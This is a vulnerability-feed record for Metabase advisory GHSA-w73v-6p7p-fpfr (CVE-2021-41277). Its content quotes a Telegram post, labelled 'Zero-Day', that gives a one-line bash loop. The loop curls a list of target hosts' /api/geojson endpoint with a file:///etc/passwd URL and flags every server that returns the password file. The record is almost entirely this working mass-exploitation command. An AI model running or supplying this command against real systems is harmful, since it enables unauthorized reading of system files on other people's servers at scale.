{"uuid": "4899048b-9161-490c-ac2a-a739d4afb69e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "GHSA-W73V-6P7P-FPFR", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8206", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day | CVE-2021-41277\n\ncat targets.txt | while read host do;do curl --silent --insecure --path-as-is \"$host/api/geojson?url=file:///etc/passwd\" | grep -qs \"root:x\" && echo \"$host \\033[0;31m Vulnerable\";done\n\nhttps://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr", "creation_timestamp": "2021-11-24T19:33:37.000000Z"}